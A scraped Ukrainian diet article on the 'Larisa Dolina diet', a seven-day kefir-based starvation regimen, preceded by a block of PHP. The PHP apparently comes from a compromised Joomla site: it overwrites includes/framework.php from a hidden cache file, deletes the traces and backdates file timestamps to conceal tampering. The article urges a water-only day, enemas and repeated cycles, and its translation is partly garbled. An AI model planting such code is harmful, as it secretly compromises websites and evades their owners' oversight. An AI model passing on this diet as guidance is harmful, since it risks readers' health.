$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Дієта Лариси Доліної | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Дієта Лариси Доліної


Я, як, сподіваюся, і ви, з величезним задоволенням слухаю пісні у виконанні Лариси Доліної. І зміни фігури співачки, яка трапилася не так давно, просто неможливо було не помітити. З чуток - вже не знаю, вірити їм чи ні - схудла Лариса Доліна саме завдяки дієті, описаної на цій сторінці (а зовсім не тим пігулкам для схуднення, які вона свого часу так активно рекламувала по ТБ:). Тому й назва - дієта Лариси Доліної - приліпилося до цієї дієті дуже міцно. Хоча правильніше було б назвати її по імені автора - дієта доктора Сайкова.

Тривалість дієти Долиною - 7 днів. Харчування в ці дні регламентується дуже суворо, замінювати продукти і взагалі хоч в чомусь відхилятися від запропонованих дієтою правил не можна.

Весь денний раціон треба розділити на 6 приблизно рівних частин і їсти строго за часом - у 8, 10, 12, 14, 16, 18 годин (звичайно, якщо ви прокидаєтеся тільки в 11 годин ранку і лягаєте спати далеко за північ, то години прийому їжі можна зьшщувати відповідно до вашого розпорядком дня - перший прийом їжі незабаром після підйому, останній - не менш ніж за 4 години до сну).

Перед кожним прийомом їжі необхідно випивати по 50 мл (чверть склянки) настою трав - звіробою, ромашки і календули (по одному пакетику кожної трави на склянку окропу, заварювати можна один раз на весь день, вранці).

Раціон дієти Лариси Доліної по днях тижня (нагадаю, витримувати треба дуже суворо):
1 день - 400 грам печеної картоплі без солі і 0.5 літра кефіру 1% жирності;
2 день - 400 грамів знежиреного сиру і 0.5 літра кефіру 1% жирності;
3 день - 400 грам фруктів (будь-яких, крім солодких: бананів, винограду) і 0.5 літра кефіру 1% жирності;
4 день - 400 грам варених курячих грудок без солі і 0.5 літра кефіру 1% жирності;
5 день - 400 грам фруктів і 0.5 літра кефіру 1% жирності;
6 день - 1.5 літри мінеральної води без газів (для цього пляшку з водою необхідно відкрити напередодні);
7 день - 400 грам фруктів і 0.5 літра кефіру 1% жирності.

Крім перерахованих продуктів можна вранці випивати чашку чорної кави без цукру, а протягом дня пити кип'ячену воду (не більше 0.5 літра за день). Треба щодня спорожняти кишечник (якщо буде потрібно - за допомогою клізми).

Після 7 днів дієти тиждень можна харчуватися як завжди, але обмеживши солодощі, жирні, гострі і борошняні страви - таким чином домагається закріплення отриманого результату. За цей тиждень можлива надбавка 0.5-1 кг ваги, але лякатися не треба, це нормально. Після 7 днів "закріплення" необхідно знов приступити до дієти. Чергувати дієту закріплювати тижнем необхідно до тих пір, поки не досягнете бажаного ваги.

Дієта Доліної дуже серйозно обмежує обсяг і калорійність раціону. Витримати її нелегко, особливо повторні тижні. При цьому, треба зауважити, раціон дієти досить збалансований (наскільки це взагалі можливо при настільки малих обсягах їжі), в ньому містяться і білки, і вітаміни, і мікроелементи, і баластні речовини (клітковина). Тому рекомендація - повторювати дієту, чергуючи з закріплюючим тижнем, "поки не досягнете бажаного ваги" - здається мені цілком реальною. Хоча, думаю, якщо ви не домоглися бажаної маси тіла за три повтора, то варто серйозно задуматися, а чи реальна взагалі та мета, яку ви перед собою поставили:).

Будьте зорові та красиві.

 
Ефективні дієти Дієта Лариси Доліної